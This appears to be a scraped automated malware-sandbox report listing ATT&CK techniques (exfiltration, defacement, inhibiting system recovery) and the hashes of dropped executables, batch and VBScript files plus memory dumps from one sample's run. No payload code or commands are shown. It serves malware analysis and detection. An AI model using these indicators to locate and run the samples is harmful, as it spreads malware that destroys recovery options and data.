Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\$Recycle.Bin\S-1-5-21-999675638-2867687379-27515722-1000\desktop.ini

Filesize
1KB

MD5
d16f0e859a4b8d7b427fc016af701c55

SHA1
015be63c10a84a52b38848098f307a8bf351b7d1

SHA256
8d771303d1ce51fcd3a0c4ddfb553524d558e54660f44bc976017a02f5ba52d6

SHA512
374f12d82e4d9d2b0d09a54b8addcfa8ec59db34adb4880179225f516afc4518f99385111b43546c85946ce65240292e9a32ce01bf5a7ef2c612452bfde31672

Download Submit
C:\Users\Admin\AppData\Local\Temp\FfRHK9B8.txt

Filesize
14B

MD5
8eb51985066cb0782077f624013d47a2

SHA1
0549d07d51454e73b937946ba1887cacfce71835

SHA256
5537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44

SHA512
539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe

Filesize
1.2MB

MD5
6411153c8a95e8c77127d99c75595604

SHA1
02e6b8baed744a6b0c78baddf1720654688e5642

SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

Download Submit
C:\Users\Admin\AppData\Local\Temp\NWb6U328.exe

Filesize
1.2MB

MD5
6411153c8a95e8c77127d99c75595604

SHA1
02e6b8baed744a6b0c78baddf1720654688e5642

SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

Download Submit
C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\XPo38R1T.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\XPo38R1T64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
C:\Users\Admin\AppData\Local\Temp\hwydVNNs.bat

Filesize
246B

MD5
c6f651a9c6fbad629b34f2831a19f0f8

SHA1
14083d371e08dc21478203cf866502989d0cc0d9

SHA256
657a345b45277e8a7990e2fb04d4d4d5121beb057be45d0f377dfc473c7b4ead

SHA512
5d7c251574f72dc3d5b6684d476fa3f9fbd1755feadd79c34195760701c906c16e7bb7cabc959cec96bab09b72b17ec2391cb162d6425fc0c717a20f343bd686

Download Submit
C:\Users\Admin\AppData\Roaming\MCOOq9KH.bat

Filesize
265B

MD5
cf9a3b0a800a06c7f55d613ccb09a225

SHA1
98a5053e45981d99fb2fe0c0cfdaaa59585f62c6

SHA256
215458f32f2ab57c39871a6ba6f6cfa01006b01cb1b1af4434933caf0e6ae3be

SHA512
6dbacbb5bf202139fa9859eed49c541a9ad0ff8a756fced9d7c9b7cc601fcd8ca9b8391537ee441f82d7865d3818bc6db632ecffe3b01f6abb29430ce106fd6e

Download Submit
C:\Users\Admin\AppData\Roaming\w9SzCseH.vbs

Filesize
260B

MD5
f18196ef66c0d59fb0531eba14dca100

SHA1
56666a9d0bf32e0d94ccbc4f2687f0d207accb20

SHA256
732af3f105bdffe441ea59f66bda7f1d61c2eaa60d477958e8d66137d592a7c1

SHA512
0210a02c6b67768e3dfd2da47b308a7a100a3d553739ee49d84a78aa9d7516e21f95d662ffea75c19cd53a707b873ee2f09ea02eb90ee94980870852a6b314dc

Download Submit
\Users\Admin\AppData\Local\Temp\NWb6U328.exe

Filesize
1.2MB

MD5
6411153c8a95e8c77127d99c75595604

SHA1
02e6b8baed744a6b0c78baddf1720654688e5642

SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

Download Submit
\Users\Admin\AppData\Local\Temp\NWb6U328.exe

Filesize
1.2MB

MD5
6411153c8a95e8c77127d99c75595604

SHA1
02e6b8baed744a6b0c78baddf1720654688e5642

SHA256
2d95141169b25449c5fb2ac2c91857c1a2855c10914dfdac53dde5e45e3714d3

SHA512
65f8479bb477d76af915811b44a06bc4ca076955d22e6d3cdc336f6e3c7d7299ef52da81aa3d13f6f5f9170ba5b9ac049fe67edc1df0a8899e8a4b7b03a82ade

Download Submit
\Users\Admin\AppData\Local\Temp\XPo38R1T.exe

Filesize
181KB

MD5
2f5b509929165fc13ceab9393c3b911d

SHA1
b016316132a6a277c5d8a4d7f3d6e2c769984052

SHA256
0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

SHA512
c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

Download Submit
\Users\Admin\AppData\Local\Temp\XPo38R1T64.exe

Filesize
221KB

MD5
3026bc2448763d5a9862d864b97288ff

SHA1
7d93a18713ece2e7b93e453739ffd7ad0c646e9e

SHA256
7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

SHA512
d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

Download Submit
memory/520-76-0x0000000000000000-mapping.dmp

Download
memory/772-94-0x0000000000000000-mapping.dmp

Download
memory/800-77-0x0000000000000000-mapping.dmp

Download
memory/904-59-0x0000000000000000-mapping.dmp

Download
memory/972-71-0x0000000000000000-mapping.dmp

Download
memory/996-95-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/996-89-0x0000000000000000-mapping.dmp

Download
memory/1020-70-0x0000000000000000-mapping.dmp

Download
memory/1084-80-0x0000000000000000-mapping.dmp

Download
memory/1188-102-0x0000000000000000-mapping.dmp

Download
memory/1192-69-0x0000000000000000-mapping.dmp

Download
memory/1204-78-0x0000000000000000-mapping.dmp

Download
memory/1204-55-0x0000000000000000-mapping.dmp

Download
memory/1368-92-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1368-98-0x0000000000400000-0x0000000000477000-memory.dmp

Filesize
476KB

Download
memory/1368-86-0x0000000000000000-mapping.dmp

Download
memory/1404-68-0x0000000000000000-mapping.dmp

Download
memory/1424-54-0x0000000076151000-0x0000000076153000-memory.dmp

Filesize
8KB

Download
memory/1476-79-0x0000000000000000-mapping.dmp

Download
memory/1540-103-0x0000000000000000-mapping.dmp

Download
memory/1556-84-0x0000000000000000-mapping.dmp

Download
memory/1556-72-0x0000000000000000-mapping.dmp

Download
memory/1564-83-0x0000000000000000-mapping.dmp

Download
memory/1608-100-0x0000000000000000-mapping.dmp

Download
memory/1692-104-0x0000000000000000-mapping.dmp

Download
memory/1748-73-0x0000000000000000-mapping.dmp

Download
memory/1748-85-0x0000000000000000-mapping.dmp

Download
memory/1784-101-0x0000000000000000-mapping.dmp

Download
memory/1784-82-0x0000000000000000-mapping.dmp

Download
memory/1792-63-0x0000000000000000-mapping.dmp

Download
memory/1792-65-0x0000000073580000-0x0000000073B2B000-memory.dmp

Filesize
5.7MB

Download
memory/1792-66-0x0000000073580000-0x0000000073B2B000-memory.dmp

Filesize
5.7MB

Download
memory/1816-62-0x0000000000000000-mapping.dmp

Download